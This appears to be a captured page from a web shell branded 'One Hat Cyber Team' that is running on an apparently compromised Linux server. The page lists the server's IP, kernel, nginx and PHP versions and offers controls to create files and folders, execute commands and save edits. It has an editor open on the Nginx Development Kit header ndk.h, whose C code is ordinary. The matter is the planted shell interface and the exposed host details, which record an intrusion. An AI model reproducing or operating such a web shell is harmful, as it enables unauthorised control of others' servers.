⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.124
Server IP:
50.28.103.30
Server:
Linux host.jcukjv-lwsites.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
Server Software:
nginx/1.28.0
PHP Version:
8.3.12
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
www
/
server
/
nginx
/
src
/
ngx_devel_kit
/
src
/
Edit File: ndk.h
/* * 2010 (C) Marcus Clyne */ #ifndef NDK_H #define NDK_H #include
#include
#include
#define ndk_version 2015 #define NDK_VERSION "0.2.15" #if (NGX_DEBUG) #ifndef NDK_DEBUG #define NDK_DEBUG 1 #endif #else #ifndef NDK_DEBUG #define NDK_DEBUG 0 #endif #endif #if !(NDK) #error At least one module requires the Nginx Development Kit to be compiled with \ the source (add --with-module=/path/to/devel/kit/src to configure command) #endif #include
#if (NDK_HTTP_CREATE_MAIN_CONF) #define ndk_http_conf_get_main_conf(cf) ngx_http_conf_get_module_main_conf (cf, ndk_http_module) #define ndk_http_get_main_conf(r) ngx_http_get_module_main_conf (r, ndk_http_module) typedef struct { #if (NDK_UPSTREAM_LIST) ngx_array_t *upstreams; #endif } ndk_http_main_conf_t; #endif /* NDK_HTTP_CREATE_MAIN_CONF */ #include
extern ngx_module_t ndk_http_module; #endif
Simpan